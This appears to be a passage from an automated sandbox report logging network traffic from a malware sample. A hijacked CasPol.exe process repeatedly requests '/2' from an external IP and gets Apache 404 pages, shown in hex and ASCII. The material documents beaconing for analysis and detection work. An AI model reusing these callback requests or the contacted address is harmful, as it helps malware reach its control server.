                                                    Mar 20, 2023 13:19:58.816569090 CET283OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:19:58.909148932 CET283INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:19:58 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:19:58.909228086 CET284INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:19:58.909280062 CET284INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:19:58.909333944 CET284INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:19:58.909383059 CET284INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.11.204979837.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:17:07.058161974 CET179OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:17:07.129527092 CET179INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:17:07 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:17:07.143343925 CET180INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:17:07.143439054 CET180INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:17:07.143497944 CET180INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:17:07.143595934 CET181INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    20192.168.11.204982737.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:20:08.938875914 CET292OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:20:08.962862968 CET292INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:20:08 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:20:08.962925911 CET293INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:20:08.962971926 CET293INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:20:08.963013887 CET294INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:20:08.963059902 CET294INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    21192.168.11.204982937.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:20:19.000097990 CET301OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:20:19.051856041 CET301INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:20:18 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:20:19.051923037 CET302INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:20:19.051974058 CET302INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:20:19.052016973 CET303INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:20:19.052059889 CET303INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    22192.168.11.204983037.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:20:29.075845957 CET303OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:20:29.104176044 CET304INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:20:29 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:20:29.104244947 CET304INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:20:29.104290962 CET305INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:20:29.104368925 CET305INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:20:29.104415894 CET305INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    23192.168.11.204983237.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:20:39.138921976 CET313OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:20:39.227524042 CET313INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:20:39 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:20:39.227592945 CET314INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:20:39.227638960 CET314INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:20:39.227682114 CET314INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:20:39.227729082 CET314INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    24192.168.11.204983337.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:20:49.257998943 CET315OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:20:49.293009043 CET316INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:20:49 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
